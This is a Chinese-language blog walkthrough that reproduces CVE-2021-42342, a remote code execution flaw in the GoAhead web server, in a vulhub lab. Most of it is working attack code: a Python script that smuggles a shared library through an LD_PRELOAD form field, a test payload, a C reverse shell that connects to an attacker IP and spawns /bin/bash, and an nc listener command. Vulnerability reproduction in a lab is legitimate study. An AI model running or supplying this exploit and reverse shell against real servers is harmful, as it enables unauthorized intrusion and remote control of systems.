所需环境
环境搭建
漏洞复现
poc(漏洞复现)
shell反弹
poc(shell反弹)
所需环境:
- Linux(kali)操作系统
- vilhub靶场
- windows7(nc)
环境搭建:
- 打开终端输入:cd /root/桌面/vulhub-master/goahead/CVE-2021-42342/进入靶场目录
- 在该目录执行命令:dockers-compose up -d
- 查看容器开启端口:docker ps
- 启动完成后,访问http://your-ip:8080/即可看到欢迎页面。访问http://your-ip:8080/cgi-bin/index即可查看到Hello页面,即为CGI执行的结果。
示例:
漏洞复现
编写打印测试文件的poc代码如下(payload.c)
#include <unistd.h>
static void before_main(void) __attribute__((constructor));
static void before_main(void)
{
write(1, "Hello: World\r\n\r\n", 16);
write(1, "Hacked\n", 7);
}
示例
这样,before_main函数将在程序执行前被调用。编译以下代码:
gcc -s -shared -fPIC ./payload.c -o payload.so
示例:
使用脚本poc.py来发送恶意数据包,复现漏洞:
poc:
后缀.py
import sys
import socket
import ssl
import random
from urllib.parse import urlparse, ParseResult
PAYLOAD_MAX_LENGTH = 16384 - 200
def exploit(client, parts: ParseResult, payload: bytes):
path = '/' if not parts.path else parts.path
boundary = '----%s' % str(random.randint(1000000000000, 9999999999999))
padding = 'a' * 2000
content_length = min(len(payload) + 500, PAYLOAD_MAX_LENGTH)
data = fr'''POST {path} HTTP/1.1
Host: {parts.hostname}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary={boundary}
Content-Length: {content_length}
--{boundary}
Content-Disposition: form-data; name="LD_PRELOAD";
/proc/self/fd/7
--{boundary}
Content-Disposition: form-data; name="data"; filename="1.txt"
Content-Type: text/plain
#payload#{padding}
--{boundary}--
'''.replace('\n', '\r\n')
data = data.encode().replace(b'#payload#', payload)
client.send(data)
resp = client.recv(20480)
print(resp.decode())
def main():
target = sys.argv[1]
payload_filename = sys.argv[2]
with open(payload_filename, 'rb') as f:
data = f.read()
if len(data) > PAYLOAD_MAX_LENGTH:
raise Exception('payload size must not larger than %d', PAYLOAD_MAX_LENGTH)
parts = urlparse(target)
port = parts.port
if not parts.port:
if parts.scheme == 'https':
port = 443
else:
port = 80
context = ssl.create_default_context()
with socket.create_connection((parts.hostname, port), timeout=8) as client:
if parts.scheme == 'https':
with context.wrap_socket(client, server_hostname=parts.hostname) as ssock:
exploit(ssock, parts, data)
else:
exploit(client, parts, data)
if __name__ == '__main__':
main()
示例:(因为我所在的路径中有payload.so所以最后直接加上payload.so就行了,注意终端所在路径。)
shell反弹
POC:
后缀.c
#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>
char *server_ip="192.168.75.150";
uint32_t server_port=9999;
static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void)
{
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in attacker_addr = {0};
attacker_addr.sin_family = AF_INET;
attacker_addr.sin_port = htons(server_port);
attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
exit(0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execve("/bin/bash", 0, 0);
}
打开一个有nc的操作系统,查看该操作系统的IP地址:
示例:
在打开shell.c,将里面的IP地址修改为nc所在操作系统的地址并将端口改为nc所监听的端口:
示例:
修改完成之后返回nc所在操作系统,打开nc并监听:
nc -lvvp 9999 #这里端口可以自定义一个没有使用的端口
示例:
返回kali,输入下列命令编辑POC(shell.c)
示例:
这时所在路径下会生成一个shell.so
示例:
执行payload
示例:(此时脚本可能会报错,但没有影响)
返回nc所在操作系统查看nc:
示例:
后记:
我知道这种漏洞对于大佬来说很简单,但是都看到这了给萌新一个关注吧,谢谢。